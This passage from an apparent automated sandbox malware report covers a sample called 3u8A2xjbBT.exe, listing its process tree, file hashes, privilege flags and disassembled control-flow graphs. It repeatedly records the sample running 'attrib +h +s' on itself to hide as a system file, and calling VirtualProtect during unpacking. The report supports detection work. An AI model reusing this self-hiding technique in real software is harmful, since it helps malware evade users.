                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:48
                                    Start time:08:52:47
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:49
                                    Start time:08:53:01
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:50
                                    Start time:08:53:01
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:51
                                    Start time:08:53:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:52
                                    Start time:08:53:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:54
                                    Start time:08:53:10
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:55
                                    Start time:08:53:10
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:56
                                    Start time:08:53:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:57
                                    Start time:08:53:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:58
                                    Start time:08:53:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:59
                                    Start time:08:53:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:60
                                    Start time:08:53:25
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:61
                                    Start time:08:53:25
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:62
                                    Start time:08:53:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:63
                                    Start time:08:53:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:13.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 17508 166afe0 17509 166b02d VirtualProtect 17508->17509 17510 166b098 17509->17510

                                      Executed Functions

                                      Function 0166862C Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 100 166862c-166862e 101 1668637-1668638 100->101 102 1668630 100->102 119 1668944-16689ef 101->119 103 16687e4-16687f7 102->103 104 16688e3-16688f6 102->104 105 16689a0-16689ba 102->105 106 16689e1-16689e7 102->106 107 166892c-166893f 102->107 108 16687ad-16687ae 102->108 109 1668736-1668746 102->109 110 1668772 102->110 111 16688b3-16688c2 102->111 112 16687b3-16687bc 102->112 113 166883e-1668850 102->113 114 16687fc-166880b 102->114 115 16689bc-16689dc 102->115 116 166863d-1668650 102->116 117 16686ba-1668719 102->117 118 16688fb 102->118 102->119 120 1668982-166899e 102->120 121 16687c1-16687c4 102->121 122 166860b 102->122 123 166874b-166876d 102->123 124 1668855-166888b 102->124 125 1668893-16688ae 102->125 126 1668953 102->126 127 1668890-1668891 102->127 128 166871e-1668731 102->128 129 1668612-166862b 103->129 104->129 133 166895a-1668976 105->133 134 1668a75-1668a7c 106->134 107->129 108->134 109->129 137 166877d-16687a8 110->137 179 16688c5 call 1668df8 111->179 180 16688c5 call 1668e08 111->180 112->129 113->129 154 166881e-1668825 114->154 155 166880d-166881c 114->155 115->133 130 1668687-1668696 116->130 131 1668652-1668684 116->131 117->129 181 1668900 call 1669292 118->181 182 1668900 call 1669183 118->182 183 1668900 call 1669223 118->183 184 1668900 call 16692dd 118->184 185 1668900 call 166916b 118->185 186 1668900 call 166912b 118->186 144 16689f6 119->144 120->133 170 16687c7 call 166b2c4 121->170 171 16687c7 call 166b305 121->171 172 16687c7 call 166b190 121->172 173 16687c7 call 166b340 121->173 174 16687c7 call 166b260 121->174 175 16687c7 call 166b17f 121->175 176 16687c7 call 166b31d 121->176 177 16687c7 call 166b39d 121->177 178 16687c7 call 166b22d 121->178 122->129 123->129 124->129 125->129 126->133 127->125 128->129 129->100 163 16686a1 130->163 131->130 138 166897f-1668980 133->138 139 1668978 133->139 135 1668906-1668927 135->129 137->129 138->106 139->105 139->106 139->115 139->120 139->126 139->134 139->138 139->144 149 1668a25-1668a38 139->149 150 1668a3a-1668a57 139->150 151 1668a59-1668a73 139->151 140 16687cd-16687df 140->129 153 16689fd-1668a19 144->153 147 16688cb-16688de 147->129 149->153 150->153 151->153 159 1668a22-1668a23 153->159 160 1668a1b 153->160 158 166882c-1668839 154->158 155->158 158->129 159->134 160->134 160->144 160->149 160->150 160->151 160->159 187 16686a7 call 166b2c4 163->187 188 16686a7 call 166b305 163->188 189 16686a7 call 166b190 163->189 190 16686a7 call 166b340 163->190 191 16686a7 call 166b260 163->191 192 16686a7 call 166b17f 163->192 193 16686a7 call 166b31d 163->193 194 16686a7 call 166b39d 163->194 195 16686a7 call 166b22d 163->195 167 16686ad-16686b5 167->129 170->140 171->140 172->140 173->140 174->140 175->140 176->140 177->140 178->140 179->147 180->147 181->135 182->135 183->135 184->135 185->135 186->135 187->167 188->167 189->167 190->167 191->167 192->167 193->167 194->167 195->167
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: mp$~^
                                      • API String ID: 0-1469016468
                                      • Opcode ID: 74f60eef800dbb15fb8558e40a0db20f5a07a184f206ef4761c922a0be0ca01b
                                      • Instruction ID: ec1e333a11e1ffab472b740774dd2270a95ee518e014afd42114a386f29e02da
                                      • Opcode Fuzzy Hash: 74f60eef800dbb15fb8558e40a0db20f5a07a184f206ef4761c922a0be0ca01b
                                      • Instruction Fuzzy Hash: F9D11674E14319DFCB04CFA9D88099DBBFAFF8A310B14A529D41ABB369D73498028F15
                                      Function 016622C0 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 196 16622c0-166232b 198 1662332-166237e call 16600e4 196->198 199 166232d 196->199 203 1662381 198->203 199->198 204 1662388-16623a4 203->204 205 16623a6 204->205 206 16623ad-16623ae 204->206 205->203 205->206 207 16624e6-16624ea 205->207 208 16624c2-16624e1 205->208 209 1662582-1662594 205->209 210 1662422-166243a 205->210 211 166246d-1662471 205->211 212 16623e9-166241d 205->212 213 1662516-166252d 205->213 214 1662532 205->214 215 16623b3-16623e7 205->215 216 166249d-16624a3 205->216 217 1662599-166262a call 16600f4 205->217 206->217 220 16624ec-16624fb 207->220 221 16624fd-1662504 207->221 208->204 209->204 231 166243c-166244b 210->231 232 166244d-1662454 210->232 218 1662484-166248b 211->218 219 1662473-1662482 211->219 212->204 213->204 223 166253c-166257d 214->223 215->204 226 16624ab-16624bd 216->226 242 166262c call 1663cdd 217->242 243 166262c call 166360a 217->243 224 1662492-1662498 218->224 219->224 222 166250b-1662511 220->222 221->222 222->204 223->204 224->204 226->204 233 166245b-1662468 231->233 232->233 233->204 241 1662632-166263c 242->241 243->241
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq$Teq
                                      • API String ID: 0-2938103587
                                      • Opcode ID: 0e854965b36afd2870c9e42c5417c392344b1d69b46e20b4ef93f5344b3fe86f
                                      • Instruction ID: 8bb59f4dd45e2e0767e6fdc0b89f931807570a3c041398bed2e3596d542e7e5e
                                      • Opcode Fuzzy Hash: 0e854965b36afd2870c9e42c5417c392344b1d69b46e20b4ef93f5344b3fe86f
                                      • Instruction Fuzzy Hash: AEB1E374E0421ADFCB04CFA9C990AEEBBF2FF89310F248569D815BB255D7359902CB54
                                      Function 01662308 Relevance: 2.7, Strings: 2, Instructions: 242COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 244 1662308-166232b 245 1662332-166237e call 16600e4 244->245 246 166232d 244->246 250 1662381 245->250 246->245 251 1662388-16623a4 250->251 252 16623a6 251->252 253 16623ad-16623ae 251->253 252->250 252->253 254 16624e6-16624ea 252->254 255 16624c2-16624e1 252->255 256 1662582-1662594 252->256 257 1662422-166243a 252->257 258 166246d-1662471 252->258 259 16623e9-166241d 252->259 260 1662516-166252d 252->260 261 1662532 252->261 262 16623b3-16623e7 252->262 263 166249d-16624a3 252->263 264 1662599-166262a call 16600f4 252->264 253->264 267 16624ec-16624fb 254->267 268 16624fd-1662504 254->268 255->251 256->251 278 166243c-166244b 257->278 279 166244d-1662454 257->279 265 1662484-166248b 258->265 266 1662473-1662482 258->266 259->251 260->251 270 166253c-166257d 261->270 262->251 273 16624ab-16624bd 263->273 289 166262c call 1663cdd 264->289 290 166262c call 166360a 264->290 271 1662492-1662498 265->271 266->271 269 166250b-1662511 267->269 268->269 269->251 270->251 271->251 273->251 280 166245b-1662468 278->280 279->280 280->251 288 1662632-166263c 289->288 290->288
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq$Teq
                                      • API String ID: 0-2938103587
                                      • Opcode ID: e3ea770c84e12aa29be7ad59f9928504d6ff0cce12afb35e85772b6c97ffdd06
                                      • Instruction ID: 0240d94b8fab91c75a2a53fe4309c9c0dda434e843fadf6ac30625a1939241bd
                                      • Opcode Fuzzy Hash: e3ea770c84e12aa29be7ad59f9928504d6ff0cce12afb35e85772b6c97ffdd06
                                      • Instruction Fuzzy Hash: 6BA1D3B4E00219DFDB04CFA9C990AAEBBF6BF88300F248529D815BB354D7359902CF54
                                      Function 0166ED78 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 291 166ed78-166ed9d 292 166eda4-166ede5 291->292 293 166ed9f 291->293 297 166ede8 292->297 293->292 298 166edef-166ee0b 297->298 299 166ee14-166ee15 298->299 300 166ee0d 298->300 310 166efb2-166efb4 299->310 300->297 300->299 301 166f006-166f04c call 16672a8 300->301 302 166ef07-166ef17 300->302 303 166efc2 300->303 304 166ee40-166ee44 300->304 305 166ef61-166ef71 300->305 306 166eeef-166ef02 300->306 307 166f06a-166f06f 300->307 308 166ee77-166ee87 300->308 309 166eed7-166eeea 300->309 300->310 311 166eff1-166f004 300->311 312 166f051-166f065 300->312 313 166eebf-166eed2 300->313 314 166ef9a-166efad 300->314 315 166ee1a-166ee3e 300->315 319 166efc9-166efe5 301->319 323 166ef28 302->323 324 166ef19-166ef26 302->324 303->319 316 166ee46-166ee55 304->316 317 166ee57-166ee5e 304->317 325 166ef82 305->325 326 166ef73-166ef76 305->326 306->298 318 166f071-166f078 307->318 320 166ee98 308->320 321 166ee89-166ee96 308->321 309->298 310->318 311->319 312->319 313->298 314->298 315->298 329 166ee65-166ee72 316->329 317->329 330 166efe7 319->330 331 166efee-166efef 319->331 333 166ee9b-166ee9f 320->333 321->333 335 166ef2b-166ef31 323->335 324->335 327 166ef85 325->327 339 166ef80 326->339 340 166ef8d-166ef95 327->340 329->298 330->301 330->303 330->307 330->311 330->312 330->331 331->307 341 166eea8-166eeba 333->341 342 166ef3a-166ef5c 335->342 339->327 340->298 341->298 342->298
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lGkG$~ag!
                                      • API String ID: 0-1955306851
                                      • Opcode ID: f1d039b007b1912a5520b9a7cbb9526131a74ef6106f92e6230dc5823eaa49af
                                      • Instruction ID: c114af723da97c19579858830055ea72d73b39d627d80f49d818a24759c78f77
                                      • Opcode Fuzzy Hash: f1d039b007b1912a5520b9a7cbb9526131a74ef6106f92e6230dc5823eaa49af
                                      • Instruction Fuzzy Hash: 2E91F374E05208CFDB14CFA9D994A9DFBB6FB89310F24A42AD416BB258D7319942CF24
                                      Function 016616A6 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 416 16616a6-1661761 417 1661763 416->417 418 1661768-16617bc 416->418 417->418 419 16617c3-16617df 418->419 420 16617e1-16617f8 419->420 421 16617e8-16621d0 419->421 424 16617ff-166180c 420->424 425 16617fa 420->425 437 16621d6 call 16622c0 421->437 438 16621d6 call 1662308 421->438 427 1661813-1661823 424->427 428 166180e 424->428 425->424 426 16621dc-16621e2 431 16621ed-1662252 426->431 429 1661825 427->429 430 166182a-1661842 427->430 428->427 429->430 430->419 437->426 438->426
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: *Jsx$p
                                      • API String ID: 0-2268291355
                                      • Opcode ID: e91f7a1d97885a6c8fa6a5aa83c1bc899cf5fe144340fcfc2f0c271a3cb4d8f5
                                      • Instruction ID: f8ed35b98d374151592797af9fa9d3477a9158ed1931232757c0ed3d18aabcae
                                      • Opcode Fuzzy Hash: e91f7a1d97885a6c8fa6a5aa83c1bc899cf5fe144340fcfc2f0c271a3cb4d8f5
                                      • Instruction Fuzzy Hash: C7516971D04759CFDB59CF6ACC516DABBF2EF89310F14C0AAC848AA215EB345A45CF21
                                      Function 0B6B3768 Relevance: 1.6, Strings: 1, Instructions: 393COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 439 b6b3768-b6b3793 440 b6b379a-b6b37cd 439->440 441 b6b3795 439->441 442 b6b37ce 440->442 441->440 443 b6b37d5-b6b37f1 442->443 444 b6b37fa-b6b37fb 443->444 445 b6b37f3 443->445 466 b6b3837-b6b385b 444->466 445->442 445->444 446 b6b3a4b 445->446 447 b6b39ea-b6b3a01 445->447 448 b6b3aca 445->448 449 b6b3a8f-b6b3aaa 445->449 450 b6b388e-b6b38ae 445->450 451 b6b3aac-b6b3ac8 445->451 452 b6b3a03 445->452 453 b6b3942-b6b39ba 445->453 454 b6b3b87-b6b3ba3 445->454 455 b6b38c5-b6b38ff 445->455 456 b6b3ba5 445->456 457 b6b3904-b6b3917 445->457 458 b6b39bb 445->458 459 b6b3a7a-b6b3a8d 445->459 460 b6b3af9-b6b3b15 445->460 461 b6b3b58-b6b3b5a 445->461 462 b6b37fd-b6b3835 445->462 463 b6b385c 445->463 464 b6b391c-b6b3920 445->464 465 b6b38b0-b6b38c3 445->465 445->466 467 b6b3b17 445->467 470 b6b3a52-b6b3a6e 446->470 468 b6b39c2-b6b39de 447->468 473 b6b3ad1-b6b3aed 448->473 449->470 469 b6b3863-b6b387f 450->469 451->448 451->467 474 b6b3a09-b6b3a42 452->474 453->458 471 b6b3b5f-b6b3b7b 454->471 455->469 487 b6b3c61 456->487 457->469 458->468 459->470 460->473 461->471 462->443 463->469 482 b6b392b-b6b393d 464->482 465->469 466->463 467->461 491 b6b39e0 468->491 492 b6b39e7-b6b39e8 468->492 493 b6b3888-b6b3889 469->493 494 b6b3881 469->494 477 b6b3a70 470->477 478 b6b3a77-b6b3a78 470->478 480 b6b3b7d 471->480 481 b6b3b84-b6b3b85 471->481 484 b6b3aef 473->484 485 b6b3af6-b6b3af7 473->485 474->446 477->446 477->448 477->449 477->451 477->454 477->456 477->459 477->460 477->461 477->467 477->478 477->487 495 b6b3d48 477->495 496 b6b3dae-b6b3dbe 477->496 497 b6b3cad-b6b3cc0 477->497 498 b6b3cc2 477->498 499 b6b3d80-b6b3d93 477->499 500 b6b3ce7 477->500 501 b6b3d33-b6b3d46 477->501 502 b6b3d51 477->502 503 b6b3c90-b6b3cab 477->503 504 b6b3d16-b6b3d31 477->504 505 b6b3d95-b6b3dac 477->505 478->451 480->454 480->456 480->461 480->487 480->495 480->496 480->497 480->498 480->499 480->500 480->501 480->502 480->503 480->504 480->505 481->454 481->456 482->469 484->448 484->454 484->456 484->460 484->461 484->467 484->485 484->487 484->495 484->496 484->497 484->498 484->499 484->500 484->501 484->502 484->503 484->504 484->505 485->467 506 b6b3c68-b6b3c84 487->506 491->446 491->447 491->448 491->449 491->451 491->452 491->454 491->456 491->458 491->459 491->460 491->461 491->467 491->487 491->492 491->495 491->496 491->497 491->498 491->499 491->500 491->501 491->502 491->503 491->504 491->505 492->452 493->453 494->446 494->447 494->448 494->449 494->450 494->451 494->452 494->453 494->454 494->455 494->456 494->457 494->458 494->459 494->460 494->461 494->463 494->464 494->465 494->467 494->487 494->493 495->502 497->506 498->500 509 b6b3d58-b6b3d74 499->509 507 b6b3cee-b6b3d0a 500->507 501->507 502->509 503->506 504->507 505->509 512 b6b3c8d-b6b3c8e 506->512 513 b6b3c86 506->513 521 b6b3d0c 507->521 522 b6b3d13-b6b3d14 507->522 517 b6b3d7d-b6b3d7e 509->517 518 b6b3d76 509->518 512->498 512->503 513->487 513->495 513->496 513->497 513->498 513->499 513->500 513->501 513->502 513->503 513->504 513->505 517->496 517->499 518->496 518->499 518->502 518->505 521->495 521->496 521->499 521->500 521->501 521->502 521->504 521->505 522->495 522->504
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 57c8d43044cee1a93dc97e5dad3d3fcc4eaa09ab10913fc1b0111a7b46417242
                                      • Instruction ID: 54ff8ef7401d4c435388257f9374d65083fced717b0a73c99d225577e099a3f7
                                      • Opcode Fuzzy Hash: 57c8d43044cee1a93dc97e5dad3d3fcc4eaa09ab10913fc1b0111a7b46417242
                                      • Instruction Fuzzy Hash: 0AF1F7B4E15218CFDB54CFA6C944ADDBBF2BB8D301F20946AD41AAB358D7309D468F18
                                      Function 0B6B375B Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 528 b6b375b-b6b3764 529 b6b36e6-b6b36f5 528->529 530 b6b3766-b6b3793 528->530 531 b6b36fc-b6b370a 529->531 532 b6b36f7 529->532 533 b6b379a-b6b37cd 530->533 534 b6b3795 530->534 532->531 535 b6b37ce 533->535 534->533 536 b6b37d5-b6b37f1 535->536 538 b6b37fa-b6b37fb 536->538 539 b6b37f3 536->539 560 b6b3837-b6b385b 538->560 539->535 539->538 540 b6b3a4b 539->540 541 b6b39ea-b6b3a01 539->541 542 b6b3aca 539->542 543 b6b3a8f-b6b3aaa 539->543 544 b6b388e-b6b38ae 539->544 545 b6b3aac-b6b3ac8 539->545 546 b6b3a03 539->546 547 b6b3942-b6b39ba 539->547 548 b6b3b87-b6b3ba3 539->548 549 b6b38c5-b6b38ff 539->549 550 b6b3ba5 539->550 551 b6b3904-b6b3917 539->551 552 b6b39bb 539->552 553 b6b3a7a-b6b3a8d 539->553 554 b6b3af9-b6b3b15 539->554 555 b6b3b58-b6b3b5a 539->555 556 b6b37fd-b6b3835 539->556 557 b6b385c 539->557 558 b6b391c-b6b3920 539->558 559 b6b38b0-b6b38c3 539->559 539->560 561 b6b3b17 539->561 564 b6b3a52-b6b3a6e 540->564 562 b6b39c2-b6b39de 541->562 567 b6b3ad1-b6b3aed 542->567 543->564 563 b6b3863-b6b387f 544->563 545->542 545->561 568 b6b3a09-b6b3a42 546->568 547->552 565 b6b3b5f-b6b3b7b 548->565 549->563 581 b6b3c61 550->581 551->563 552->562 553->564 554->567 555->565 556->536 557->563 576 b6b392b-b6b393d 558->576 559->563 560->557 561->555 585 b6b39e0 562->585 586 b6b39e7-b6b39e8 562->586 587 b6b3888-b6b3889 563->587 588 b6b3881 563->588 571 b6b3a70 564->571 572 b6b3a77-b6b3a78 564->572 574 b6b3b7d 565->574 575 b6b3b84-b6b3b85 565->575 578 b6b3aef 567->578 579 b6b3af6-b6b3af7 567->579 568->540 571->540 571->542 571->543 571->545 571->548 571->550 571->553 571->554 571->555 571->561 571->572 571->581 589 b6b3d48 571->589 590 b6b3dae-b6b3dbe 571->590 591 b6b3cad-b6b3cc0 571->591 592 b6b3cc2 571->592 593 b6b3d80-b6b3d93 571->593 594 b6b3ce7 571->594 595 b6b3d33-b6b3d46 571->595 596 b6b3d51 571->596 597 b6b3c90-b6b3cab 571->597 598 b6b3d16-b6b3d31 571->598 599 b6b3d95-b6b3dac 571->599 572->545 574->548 574->550 574->555 574->581 574->589 574->590 574->591 574->592 574->593 574->594 574->595 574->596 574->597 574->598 574->599 575->548 575->550 576->563 578->542 578->548 578->550 578->554 578->555 578->561 578->579 578->581 578->589 578->590 578->591 578->592 578->593 578->594 578->595 578->596 578->597 578->598 578->599 579->561 600 b6b3c68-b6b3c84 581->600 585->540 585->541 585->542 585->543 585->545 585->546 585->548 585->550 585->552 585->553 585->554 585->555 585->561 585->581 585->586 585->589 585->590 585->591 585->592 585->593 585->594 585->595 585->596 585->597 585->598 585->599 586->546 587->547 588->540 588->541 588->542 588->543 588->544 588->545 588->546 588->547 588->548 588->549 588->550 588->551 588->552 588->553 588->554 588->555 588->557 588->558 588->559 588->561 588->581 588->587 589->596 591->600 592->594 603 b6b3d58-b6b3d74 593->603 601 b6b3cee-b6b3d0a 594->601 595->601 596->603 597->600 598->601 599->603 606 b6b3c8d-b6b3c8e 600->606 607 b6b3c86 600->607 615 b6b3d0c 601->615 616 b6b3d13-b6b3d14 601->616 611 b6b3d7d-b6b3d7e 603->611 612 b6b3d76 603->612 606->592 606->597 607->581 607->589 607->590 607->591 607->592 607->593 607->594 607->595 607->596 607->597 607->598 607->599 611->590 611->593 612->590 612->593 612->596 612->599 615->589 615->590 615->593 615->594 615->595 615->596 615->598 615->599 616->589 616->598
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]}t
                                      • API String ID: 0-2193755659
                                      • Opcode ID: 83f0e977dc0b2a4a8fbe1ed1e277931d463b6874c51d3a75ebb687a9bdf00e87
                                      • Instruction ID: 173065defa29e24d1bcc2ae14e094ad79111f4215989866c347d28bb97071c9a
                                      • Opcode Fuzzy Hash: 83f0e977dc0b2a4a8fbe1ed1e277931d463b6874c51d3a75ebb687a9bdf00e87
                                      • Instruction Fuzzy Hash: 7EF1F6B4E05209CFDB54CFA6D984A9DBBF2BB89300F24946AD419BB358D7309D45CF18
